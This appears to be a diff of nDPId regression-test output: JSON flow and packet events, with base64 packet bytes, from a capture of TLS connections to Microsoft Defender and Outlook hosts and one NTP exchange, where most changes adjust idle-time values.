-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079158,"flow_last_seen":1626168079158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079158,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1626168079158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079158,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KaAbvsuitsAAAAALAC\/\/8ZDgAAAgQFtAEDAwYBAQgKPdH+3gAAAAAEAgAA"} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079191,"flow_last_seen":1626168079191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079191,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1626168079191,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079191,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KbAbvR3yLxAAAAALAC\/\/88QgAAAgQFtAEDAwYBAQgKPdH+\/wAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1626168079206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079206,"pkt":"8BiYFWV8WNVuaKQACABFAAA0JA1AAG0G9PUocQovwKgBeQG70ppkHrV27LorbYAS\/\/90QAAAAgQFoAEDAwgBAQQC"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1626168079207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079207,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KaAbvsuittZB61d1AQEACk\/wAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1626168079243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079243,"pkt":"8BiYFWV8WNVuaKQACABFAAA0S\/NAAG0GzQ8ocQovwKgBeQG70pvEiS5w0d8i8oAS\/\/++MAAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1626168079243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079243,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KbAbvR3yLyxIkucVAQEADu7wAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1626168079361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079361,"pkt":"WNVuaKQA8BiYFWV8CABFAABM2zIAAEARlFXAqAF5Ef02+8RwAHsAOAx5IwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1626168079391,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079391,"pkt":"8BiYFWV8WNVuaKQACABFAABMVlxAADcR4isR\/Tb7wKgBeQB7xHAAOKCnJAED6wAAAAAAAAAMU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mPcazl\/+SX2Y9xr5E6"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079905,"flow_last_seen":1626168079905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079905,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1626168079905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079905,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KcAbuMyd8CAAAAALAC\/\/\/ChQAAAgQFtAEDAwYBAQgKPdIBvwAAAAAEAgAA"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079937,"flow_last_seen":1626168079937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079937,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1626168079937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079937,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KdAbvq1sJRAAAAALAC\/\/+BCAAAAgQFtAEDAwYBAQgKPdIB3wAAAAAEAgAA"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079957,"pkt":"8BiYFWV8WNVuaKQACABFAAA0g1dAAG0GlasocQovwKgBeQG70pxuzvrNjMnfA4AS\/\/\/QkQAAAgQFoAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079957,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KcAbuMyd8Dbs76zlAQEAABUQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079986,"pkt":"8BiYFWV8WNVuaKQACABFAAA0TOVAAG0GzB0ocQovwKgBeQG70p13uqY86tbCUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079986,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KdAbvq1sJSd7qmPVAQEAALmQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079905,"flow_last_seen":1626168079905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079905,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1626168079905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079905,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KcAbuMyd8CAAAAALAC\/\/\/ChQAAAgQFtAEDAwYBAQgKPdIBvwAAAAAEAgAA"} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079937,"flow_last_seen":1626168079937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079937,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 